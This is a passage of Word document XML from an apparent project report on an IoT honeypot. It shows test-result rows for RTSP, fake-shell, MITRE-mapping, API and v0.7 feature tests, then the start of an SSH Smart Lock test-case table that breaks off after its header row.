          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RTSP Digest header parsing, valid default credential, wrong password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">test_rtsp_parse_digest_header, _digest_accepts_valid…, _digest_rejects_wrong_password</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fake shell: argument tolerance, Mirai preamble, URL capture without fetch, chaining and pipes, exit, device control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">test_shell_* (6 tests)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE mapping of all detection types and command tagging; per-device credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">test_mitre_*, test_weak_credentials_per_device</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">API: health, stats shape, 9 endpoints return JSON, search requires a query</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">test_api.py (12 tests, live PostgreSQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">12 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="44D40E23" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2000" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">v0.7 features and regressions: NUL sanitising, scheme-less downloads, ELF sniffing, quarantine, YARA, sensor config, Telnet IAC, PDF, weak labels, STIX 2.1 validity, IOC idempotence, WebSocket relay, report severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">tests/test_v07.py (35 tests, live PostgreSQL and Redis)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5560" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="140" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="140" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">35 Passed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="3237018"/>
            <wp:docPr id="39" name="Picture 39"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="term_pytest.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="3237018"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">36</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: pytest Output — 78 Tests Passed (v0.7)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9037" w:name="_Toc69037"/>
      <w:r>
        <w:t xml:space="preserve">SSH Honeypot (Smart Lock)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9037"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tests the SSH honeypot emulating the Smart Lock on port 2222: credential handling, the high-interaction shell, exec channels and URL capture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Cases for the SSH Smart Lock</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="margin" w:tblpXSpec="center" w:tblpYSpec="inside"/>
        <w:tblW w:w="11146" w:type="dxa"/>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CellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="641"/>
        <w:gridCol w:w="974"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="1396"/>
        <w:gridCol w:w="1575"/>
        <w:gridCol w:w="1114"/>
        <w:gridCol w:w="1513"/>
        <w:gridCol w:w="1709"/>
        <w:gridCol w:w="758"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="39D0FE0D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="518"/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Preconditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Expected Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
